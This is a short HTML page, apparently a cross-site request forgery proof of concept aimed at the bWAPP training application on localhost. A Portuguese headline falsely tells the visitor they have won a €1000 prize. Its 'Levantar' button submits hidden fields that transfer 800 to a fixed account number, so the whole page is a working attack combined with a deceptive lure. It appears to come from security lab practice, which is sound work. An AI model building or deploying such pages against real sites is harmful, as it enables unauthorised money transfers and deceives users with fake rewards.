<html>
  <head>
    <title>Home</title>
    <meta charset="utf-8">
  </head>
  <body>
    
<div id="main">

    <h1>Parabéns você ganhou o prêmio de €1000</h1>

    <p>Clique no botão  Levantar</b></p>

    <form action="http://localhost/bwapp/bWAPP/csrf_2.php" method="GET">

        
        <input type="hidden" id="account" name="account" value="123-45678-91"></p>
        
        <input type="hidden" id="amount" name="amount" value="800"></p>

        <button type="submit" name="action" value="transfer">Levantar</button>

    </form>

</div>

</body>
</html>
